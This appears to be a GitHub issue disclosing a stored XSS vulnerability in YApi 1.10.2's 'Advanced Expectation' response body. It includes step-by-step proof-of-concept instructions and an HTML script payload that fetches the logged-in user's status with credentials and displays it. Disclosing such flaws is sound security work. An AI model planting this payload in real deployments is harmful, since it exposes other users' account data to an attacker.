yapi icon indicating copy to clipboard operation
yapi copied to clipboard
verified publisher icon YMFE

yapi 1.10.2 (2021-10-13) has a stored XSS vulnerability

Open Hebing123 opened this issue 1 year ago • 0 comments

Summary

A stored XSS vulnerability exists in Yapi 1.10.2 (2021-10-13) which allows attackers to execute arbitrary HTML code.

Details

In the advanced expectation, the user can execute any html code, which is not allowed because of the same origin relationship, we can attack any user present on the system through the vulnerability. Therefore, the ideal solution is to filter and escape the user-defined body field.

POC

  1. Register and log in to your account, create a project, and add an interface. image
  2. Choose "Advanced Expectation - Response." image
  3. Modify the body to:
<!DOCTYPE html>
<script>
    fetch('https://your-ip/api/user/status', {
            method: "GET",
            headers: {
                "Accept": "application/json"
            },
            credentials: 'include'
        })
        .then(response => response.json())
        .then(data => {
            alert(JSON.stringify(data));
        })
        .catch(err => {
            console.error('Error:', err);
            alert('Occured an error while fetching data');
        });
</script>

image Visit your Api Url, such as https://localhost/mock/4089/test image

Hebing123 avatar Apr 26 '24 02:04 Hebing123